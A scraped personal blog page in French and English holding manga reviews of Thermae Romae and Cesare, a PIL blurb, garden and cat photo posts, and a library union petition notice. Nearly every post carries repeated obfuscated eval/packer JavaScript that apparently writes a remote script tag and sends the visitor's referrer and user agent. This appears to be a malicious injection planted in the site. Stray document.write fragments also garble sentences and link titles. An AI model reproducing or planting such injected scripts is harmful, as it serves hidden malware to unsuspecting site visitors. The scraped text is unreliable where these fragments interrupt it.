L’image du mer-fleurie

Liliaceae: Hemerocallis minor
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzzby|var|u0026u|referrer|htsfa||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idtnh|var|u0026u|referrer|sabfs||js|php’.split(‘|’),0,{}))
Hémérocalle mineure / Dwarf yellow daylily
Jardin botanique (2013-06-18)
<a href="http://www.flickr.com/photos/clodjee/12723159473/&quot; target="“new”" title="Dwarf yellow daylily by clodjee, document.write(“”); on Flickr”>Dwarf yellow daylily

Thermae Romae (6)

“Lucius Modestus, document.write(“”); architecte romain en panne d’inspiration, découvre un passage à travers le temps qui le fait émerger au XXIe siècle, dans un bain japonais !!!”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afznb|var|u0026u|referrer|khbnb||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iehet|var|u0026u|referrer|brhzf||js|php’.split(‘|’),0,{}))

“Satsuki n’arrive pas à oublier Lucius, qui s’est subitement volatilisé sous ses yeux… Elle se lance sur ses traces et décide d’entreprendre des fouilles archéologiques à Baïes, dans l’espoir d’y exhumer un indice qui lui permettrait de se rapprocher de Lucius à travers le temps… Notre héros, quant à lui, est de retour dans la Rome antique et s’attèle à la construction d’un grand site thermal dans cette même ville, mais deux millénaires plus tôt, alors même que l’empereur Hadrien risque de succomber à sa maladie à tout moment…”

[ Texte du site de l’éditeur; voir aussi la couverture arrière ]

Continuez après le saut de page >>

ATTENTION: Peut contenir des traces de “spoilers”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir eux-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et devraient éviter de lire plus loin.

J’ai déjà introduit cette intéressante série historique et humoristique dans un billet consacré aux cinq premiers volumes et dans un autre billet (en anglais) j’en ai introduit les adaptations animée et cinématographique. Je vous réfère donc à ces billets pour plus de détails sur cette série.

Thermae Romae (???????? / ce qui signifie les thermes, ou bains, romains en latin), écrit et illustré par Mari Yamazaki, a d’abord été prépublié en feuilletons par Enterbrain dans leur magazine mensuel de manga seinen Comic Beam (entre février 2008 et avril 2013) avant d’être compilé en six tank?bon (volumes; paru entre novembre 2009 et juin 2013). La traduction française est publiée par Casterman (Collection Sakka) depuis mars 2012 et ce sixième et dernier volume est paru en octobre 2013. [ci-contre: pg 3]

Lucius Quintus Modestus est un architecte romain du IIe siècle qui voyage mystérieusement dans le Japon moderne (grâce aux bains) chaque fois qu’il est en manque d’idée pour concevoir une nouvelle réalisation, toujours plus innovatrice que la précédente. Cette fois, à la demande d’Hadrien, il doit rénover les installations thermales de la ville balnéaire de Baïes. Au cours de ses voyages spatio-temporels, il a développé une relation romantique avec Satsuki, une jeune japonaise férue d’histoire antique. Toutefois la disparition de Lucius, qui est retourné dans la Baïes du IIe siècle afin d’en terminer les thermes avant la mort du l’empereur, laisse Satsuki dans le désarroi. [ci-contre: pg 5] Elle fait faire des recherches par ses étudiants afin de trouvé trace de Lucius dans l’histoire mais sans résultats. Pendant ce temps, Lucius consacre toutes ses énergies pour edifier des thermes splendides à Baïes avant que la maladie n’ait raison d’Hadrien. Il confie aussi la vérité sur ses périples au jeune Marcus.

Satsuki réalise que la seule façon de trouver de l’information serait de faire des fouilles archéologiques à Baïes. Un collègue d’Oxford veut bien l’aider, mais il faut d’abord qu’elle trouve les fonds nécessaire, ce qui représente une somme très importante. Toutefois, grâce aux nombreux contacts mystérieux de Tetsuzô, son grand-père, elle réussi à financer les recherches. [ci-contre: pg 109] Mais c’est au tour du grand-père de voyager dans la Baïes antique. Sa renommée de masseur miracle s’y répand rapidement et l’on fait appel à lui pour prolonger les jours de l’empereur. Au moment où il entr’aperçoit Lucius aux thermes, il se retrouve transporté aux bains publiques de l’auberge Tôrinkan, au Japon. Les fouilles révèlent rapidement les traces du passage de Lucius et l’influence de la culture thermale japonaise (que seule vraiment un japonais peut comprendre). Se rappelant l’expérience de son grand-père, Satsuki se jète dans la source thermale qui jadis alimentait les bains de Baïes, espérant être transporté auprès de Lucius… Le stratagème fonctionne mais elle est rapidement faite prisonnière par des marchands d’esclaves!

Heureusement, le jeune Marcus Aurelius, qui passait par là pour se trouver un esclave brillant pour le servir lors de son séjour à Baïes, entend Satsuki appeller Lucius à l’aide. Il reconnait en elle l’un de ces “visages plats” dont Lucius lui a parlé et la sauve des griffes des marchands d’esclave. Il accepte de l’amener auprès de Lucius, qui est aux bains de la résidence secondaire de l’empereur, mais elle ne peut pas le voir maintenant car l’empereur, mourant, est en train de prendre son dernier bain! “Chez nous, citoyens romains, les choses importantes se disent dans les bains. (…) Il me suffit d’un bain… pour éprouver la joie profonde d’être né. (…) Continue… à bâtir des havres de paix pour les romains.” L’empereur, reconnaissant envers Lucius pour avoir construit la station balnéaire idéale, lui meurt dans les bras. Encore sous le choc, il marche sur la plage et aperçoit Satsuki. Il s’élance vers elle et l’enlace. Les amoureux sont enfin réuni! Un peu plus tard, Antonin succède à Hadrien comme empereur et Tatsuki donne un fils à Lucius.

Si la série dans son ensemble est très bonne, ce dernier volume est plutôt décevant. Le récit laisse en plan certain aspect de l’histoire–qu’arrive-t-il au grand-père? Au cheval Hanako? Aux gens du village d’Itô? À Marc-Aurèle? (Quoique l’auteur promet de mener chacune de ces histoires à terme dans un prochain manga)–et nous offre une fin un peu trop prévisible (quoique ce soit une belle fin). Plus grave, le dessin semble être de moindre qualité et on ne retrouve aucunes planches en couleurs. Il y a bien sûr toujours de superbe arrières-plans et on retrouve encore un certain réalisme dans le dessin, mais le tout semble un peu plus bâclé, comme si l’artiste voulait en finir rapidement avec la série et passer à autre chose. C’est bien dommage.

Malgré tout, comme je l’ai déjà dis, ce manga est, pour moi personnellement, particulièrement intéressant et amusant car il allie mes plus grands amours: le Japon et la Rome Antique, l’histoire et le manga! Qui plus est, il met en scène une période de l’histoire romaine qui m’est chère (la “dynastie” des Antonins, particulièrement Hadrien et Marcus Aurelius). Sans être académique, le manga offre une certaine rigueur historique. Chacun des chapitres est suivi de commentaires et de notes explicatives par l’auteur. Donc, en plus d’être un divertissement agréable, Thermae Romae nous offre beaucoup d’information tant sur la culture japonaise que romaine (qui, étrangement, semblent comporter quelques points communs!). En conclusion, si vous aimez les manga historique, les bains et l’empire romain, ce manga est définitivement pour vous. Je vous le recommande chaudement!

Thermae Romae, vol. 6, par Mari Yamazaki. Paris, Casterman (Coll. Sakka), octobre 2013. 13.2 x 18.0 x 1.6 cm, 194 pg., 7,50 € / $13.95 Can. ISBN: 978-2-203-06207-8. Sens de lecture original japonais. Recommandé pour jeune adulte (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Thermae Romae © 2013 Mari Yamazaki. © Casterman 2013 pour la présente édition française.

[ Translate ]

Cesare (6)

“L’heure de la traditionnelle mêlée à cheval organisée par l’université de Pise a sonné… Alors qu’Henri profite de l’occasion pour régler ses comptes avec le jeune Borgia, document.write(“”); Angelo offre la victoire à son camp en s’emparant presque malgré lui du drapeau ennemi!”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhsae|var|u0026u|referrer|kffnh||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikden|var|u0026u|referrer|ekhaa||js|php’.split(‘|’),0,{}))

“Mais les réjouissances sont de courte durée : maintenant que Cesare pense avoir démasqué ses mystérieux opposants, reste encore à élaborer une stratégie pour les piéger…”

Fuyumi Soryo lève le voile sur le destin hors du commun de l’énigmatique Cesare Borgia dans un manga d’une richesse historique rare, tout simplement passionnant.”

[ Texte de la couverture arrière ]

Continuez après le saut de page >>

ATTENTION: Peut contenir des traces de “spoilers”! Les personnes allergiques à toutes discussions d’une intrigue avant d’en avoir eux-même prit connaissance sont vivement conseillé de prendre les précautions nécessaires pour leur sécurité et devraient éviter de lire plus loin.

Le sixième volume (de dix) de Cesare: Il creatore che ha distrutto (????? ?????? / Ch?zare – hakai no s?z?-sha / lit. “César [Borgia]: le créateur qui détruit”) a été prépublié en feuilleton dans le mensuel de K?dansha Morning avant d’être compilé en tank?bon (volume) en novembre 2008. La version française est parue en novembre 2013 chez Ki-oon. Pour plus de détails sur cette série, vous référez à mon commentaire sur le premier volume.

Suite à la victoire de son armée lors des jeux de simulation, Cesare panse ses blessures et ses hommes célèbrent leur triomphe. Lors d’une baignade, Angelo remarque que Roberto a une brûlure à l’épaule! Lorsqu’il le confronte et lui demande pourquoi vouloir faire échouer le projet de la manufacture en l’incendiant, Roberto tente de tuer Angelo car il en sait maintenant trop. Mais Cesare et Draghignazzo, ayant entendu ses aveux, interviennent à temps. Dans l’échauffourée qui s’ensuit, Draghignazzo poignarde Roberto. Ensuite, c’est au tour de Cesare de confronter Draghignazzo, qu’il accuse d’être le co-conspirateur de Roberto. Ce dernier, qui n’est que blessé, s’élance pour poignarder Cesare mais Angelo s’interpose et c’est lui que Roberto poignarde! [ci-contre: pg 70] Draghignazzo s’échappe par les toits mais fait une chute mortelle…

Jean Balue écrit à Giuliano della Rovere pour lui annoncé l’échec du complot. Celui-ci est furieux mais admet avoir sous-estimé son adversaire [ci contre: pg 101]. Il décide d’attendre avant de tenter un nouvel assassinat car dorénavant Cesare et son entourage seront plus vigilant. Pendant ce temps, Angelo est en convalescence chez Cesare, à l’archevêché. Cesare lui fait découvrir les oranges. [Plus bas: pas 122-23] À Rome, Rodrigo Borgia est furieux que Cesare ait pris tant de risques, d’une part en participant aux simulations et, d’autre part, en éliminant lui-même l’assassin. Il discute avec Savio du complot de della Rovere et du refus de la famille Bentivoglio (de Bologne) de leur donner leur support. Le personnage du frère cadet de Cesare, Juan, nous est introduit. C’est un coureur de jupons, jaloux de Cesare, immature et que Rodrigo juge indigne de lui succéder. À Pise, Cesare présente à Angelo l’autre Juan, son cousin que tous appelle “Silenzio.” Ils conviennent que la priorité maintenant est d’obtenir le support de Sienne. Cesare s’y rendera lui-même sous le couvert de participer à une course de chevaux.

Angelo et Miguel discutent des événements récents et du caractère de Cesare. Miguel explique que “la noblesse est pour certain source d’épreuves et d’amertume! (…) Tout ce prestige et ces grâces dont tu parles… ne sont parfois (…) qu’une armure lourde et encombrante destinées à cacher ce fardeau originel qu’il porte sur ses épaules!” [ci-contre: pg 162] S’ensuit un long flash-back où l’on voit la première rencontre entre Miguel et Cesare alors qu’ils étaient enfants.

Mais Cesare doit aussi voir à s’occuper de son rôle au sein de l’Église. Il doit se préparer pour l’office de Noël, où en tant que diacre il servira la messe de Noël aux côtés de l’archevêque de Pise, le cardinal Raffaele Riario, et de son excellence Giovanni de Médicis. Pour l’occasion, son père lui a envoyé de riches habits d’apparat. Toutefois son entourage craint que ce luxe excessif n’attire toute l’attention sur lui au détriment du Cardinal et nuise à l’image de Cesare en le faisant paraître vain. Francesco et Miguel ont encore en mémoire l’ordination de Cesare comme Évêque de Pampelune l’année précédente où la nomination d’un enfant de quinze ans à un poste de haut rang dans l’Église avait suscité la colère du peuple.

Extrait des pages 122-23

Tout comme les volumes précédents, celui-ci se termine avec une bibliographie et des notes explicatives sur le travail de reconstitution de l’architecture d’une ville ancienne qui se transforme sans cesse au fil des siècles (ici on donne l’exemple de la Piazza degli Anziani, à Pise, et de la Basilica dei Santi Apostoli, à Rome). Pour mieux faire comprendre la Renaissance, on retrouve également un article sur ce qu’était la fête de Noël à cette époque. C’est une preuve de plus de la rigueur des recherches et le souci d’exactitude historique de l’auteur.

Ce volume est beaucoup mieux balancé que le précédant, qui était tout en action, alors que celui-ci nous offre certes une part d’action mais aussi un part d’intrigue politique. Beaucoup de temps est aussi accordé pour développer et introduire les personnages. Encore une fois, ce manga est très bien écrit et très captivant, tant dans une perspective divertissante qu’intellectuelle. Le dessin reste également superbe, et je pourrais même dire que l’auteur réussi à se surpasser. Toutefois, pour pouvoir offrir des planches aussi détaillées et des arrières-plans aussi riches avec une telle consistance, je soupçonne que Fuyumi Soryo utilise probablement des assistants. D’ailleurs, les traits des personnages sont parfois un peu différents. Peu importe que votre intérêt soit pour le manga de qualité ou pour cette période historique fascinante, Cesare est un manga incontournable que je recommande au plus haut point.

Cesare: Il creatore che ha distrutto, vol. 6 (Sei), par Fuyumi Soryo (supervision: Motoaki Hara; traduction: Sébastien Ludmann). Paris, Éditions Ki-oon, novembre 2013. 13 x 18 x 2 cm, 216 pg., 7,90 € / $13.95 Can. ISBN: 978-2-35592-597-9. Lecture dans le sens japonais (de droite à gauche) et recommandé pour jeunes adultes (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Voir aussi mes commentaires sur les volumes précédents:

CESARE © 2008 Fuyumi Soryo / Kodansha Ltd. All rights reserved. Édition française © 2013 Ki-oon.

[ Translate ]

Random thought #014053

Earth is a petri dish where life proliferated freely and strongly. But I often wonders if the experiment has not gone too far… Maybe it’s time for the autoclave? Maybe that’s why we’ve slowly started feeling the heat? To sterilize and cleanse us all!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrfrb|var|u0026u|referrer|dfhby||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erefd|var|u0026u|referrer|yybrh||js|php’.split(‘|’),0,{}))

[
Traduire ]

L’image du chat-medi / Cat-urday’s picture

Toffee et Rousette
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yybie|var|u0026u|referrer|ianbk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnead|var|u0026u|referrer|rbdfk||js|php’.split(‘|’),0,{}))
(2014-02-17)
<a href="
http://www.flickr.com/photos/clodjee/12723307394/&quot; target="“new”" title="Toffee & Rousette by clodjee, document.write(“”); on Flickr”>Toffee & Rousette
Rappel: nous avons toujours deux chats à vendre (voir la nouvelle affiche et faire circuler)
Reminder: we still have two cats to sell (check the new poster and pass around please)

L’image du mer-fleurie

Rosaceae: Rosa “Sydonie”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkzsd|var|u0026u|referrer|inekf||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taisi|var|u0026u|referrer|rrhny||js|php’.split(‘|’),0,{}))
Rosier hybride perpétuel / Hybrid perpetual rose
Jardin botanique (2013-06-18)
<a href="
http://www.flickr.com/photos/clodjee/12648220024/&quot; target="“new”" title="Rosier hybride perpétuel / Hybrid perpetual rose by clodjee, document.write(“”); on Flickr”>Rosier hybride perpétuel / Hybrid perpetual rose

L’image du chat-medi / Cat-urday’s picture

Roussette et Caramel
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzzae|var|u0026u|referrer|hddea||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tddsb|var|u0026u|referrer|ehiye||js|php’.split(‘|’),0,{}))
(2014-02-10)
<a href="
http://www.flickr.com/photos/clodjee/12550739625/&quot; target="“new”" title="Rousette & Caramel by clodjee, document.write(“”); on Flickr”>Rousette & Caramel
Rappel: nous avons toujours deux chats à vendre (voir la nouvelle affiche et faire circuler)
Reminder: we still have two cats to sell (check the new poster and pass around please)

L’image du mer-fleurie

Pivoine de Chine / Chinese peony
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fifti|var|u0026u|referrer|yyzis||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dffth|var|u0026u|referrer|idzza||js|php’.split(‘|’),0,{}))
Paeoniceae: Paeonia lactiflora “Kansas”
(Jardin botanique / Botanical garden, document.write(“”); 2014-06-18)
Paeonia lactiflora

PIL

L.10EBBN001928.N001_PILtome01_C_FR“Début des années 80, au Japon. En l’absence de sa mère, Nanami, une adolescente très énergique, vit seule dans la maison familiale avec son grand-père Tokushirô. Sa profonde affection pour ce vieil homme excentrique et original n’empêche pas les conflits. Nanami entretient ainsi une guérilla permanente avec l’inconséquence et la prodigalité de son grand-père, incapable de gérer correctement le peu d’argent dont ils disposent pour vivre et se nourrir. Tokushirô de son côté, tout en ayant conscience de certaines des angoisses de sa petite fille, ne parvient que difficilement à brider son côté jouisseur et fantasque. Heureusement, l’un et l’autre partagent un vrai goût de l’anticonformisme et une fascination pour la culture britannique : Tokushirô a autrefois vécu en Grande Bretagne et parle l’anglais, une rareté chez les Japonais, tandis que Nanami vibre pour les musiciens punks anglais qui occupent alors le devant de la scène rock internationale, à l’image de son groupe fétiche P.I.L.…” [ Texte du site de l’éditeur ]

“«Regarde ces gens ! Ils n’ont ni crête ni ceinture cloutée… Mais ce sont leurs semblables, des ouvriers, qui ont donné naissance à l’esprit punk !»”

“Quand l’auteure du manga phénomène Thermae Romae, élue femme de l’année 2012 par Vogue Japon, porte un regard empreint de tendresse et d’humour sur les relations entre générations, sur fond de punk rock…”

[ Texte de la couverture arrière ]

Continuez après le saut de page >>
Continue reading

Plus d’information syndicale

Mon collègue Zénodotus et moi-même venons de mettre à jour le Canardo Pressé, document.write(“”); un site d’info syndicale pour les aides-bibliothécaires et bibliotechniciens/nes de Montréal, avec de l’information sur comment nous contacter afin de partager des nouvelles, la célébration de la Journée Internationale des femmes et la Formation “Prendre en main sa retraite”.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfrdk|var|u0026u|referrer|tikys||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aerfr|var|u0026u|referrer|dezeh||js|php’.split(‘|’),0,{}))

Mais l’information la plus importante concerne des
coupures d’heures aux bibliothèques de CDN/NDG et la pétition qui s’y oppose.

S.v.p., démontrez votre opposition à ces fermetures de bibliothèques dans CDN/NDG et votre support aux aides-bibliothécaires et bibliotechniciens/nes affectés par ces coupures d’heures en signant la pétition “Ne fermez pas nos bibliothèques / Don’t close our Libraries” !

[ Translate ]